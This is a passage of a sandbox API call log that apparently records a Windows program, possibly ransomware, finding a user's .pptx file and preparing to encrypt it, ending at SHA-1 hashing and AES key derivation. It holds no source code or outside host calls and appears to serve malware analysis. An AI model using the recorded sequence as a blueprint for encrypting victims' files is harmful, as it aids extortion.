dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.293] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.293] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0033.293] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.293] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0033.293] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0033.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.293] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.293] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.294] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.294] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a3078d0, ftCreationTime.dwHighDateTime=0x1d5841f, ftLastAccessTime.dwLowDateTime=0x8dd601b0, ftLastAccessTime.dwHighDateTime=0x1d59271, ftLastWriteTime.dwLowDateTime=0x8dd601b0, ftLastWriteTime.dwHighDateTime=0x1d59271, nFileSizeHigh=0x0, nFileSizeLow=0x18731, dwReserved0=0x0, dwReserved1=0x777648, cFileName="kH1fN.pptx", cAlternateFileName="KH1FN~1.PPT")) returned 0x7c20c0 [0033.294] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.294] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.294] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a3078d0, ftCreationTime.dwHighDateTime=0x1d5841f, ftLastAccessTime.dwLowDateTime=0x8dd601b0, ftLastAccessTime.dwHighDateTime=0x1d59271, ftLastWriteTime.dwLowDateTime=0x8dd601b0, ftLastWriteTime.dwHighDateTime=0x1d59271, nFileSizeHigh=0x0, nFileSizeLow=0x18731, dwReserved0=0x0, dwReserved1=0x777648, cFileName="kH1fN.pptx", cAlternateFileName="KH1FN~1.PPT")) returned 0x7c20c0 [0033.294] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.294] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kH1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1fN.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.295] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.295] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0033.295] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.295] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.296] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.296] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.296] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.296] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.296] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.296] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a3078d0, ftCreationTime.dwHighDateTime=0x1d5841f, ftLastAccessTime.dwLowDateTime=0x8dd601b0, ftLastAccessTime.dwHighDateTime=0x1d59271, ftLastWriteTime.dwLowDateTime=0x8dd601b0, ftLastWriteTime.dwHighDateTime=0x1d59271, nFileSizeHigh=0x0, nFileSizeLow=0x18731, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="kH1fN.pptx", cAlternateFileName="KH1FN~1.PPT")) returned 0x7c2100 [0033.296] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0033.296] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.296] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.296] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.296] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.296] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0033.296] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.296] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0033.296] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.296] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.296] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0033.297] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.297] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.297] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.297] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.297] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.297] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0033.297] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.297] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0033.298] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.298] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.298] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0033.298] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.298] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.298] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.299] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.299] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.299] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.299] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.299] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.299] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.299] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.299] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.299] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.299] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0033.299] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.299] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.299] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.299] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.299] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.299] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.299] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.299] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.299] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.300] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.300] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.300] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.300] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.300] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.300] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.300] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.300] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.300] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.300] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.300] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0033.300] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.300] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.300] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.300] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.300] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0033.300] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.300] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.300] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.300] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.300] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.300] CryptHashData (hHash=0x7c2240, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0033.300] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.301] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.301] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.301] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.301] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.301] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.301] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.301] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.301] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0033.301] PeekMessageW (in: 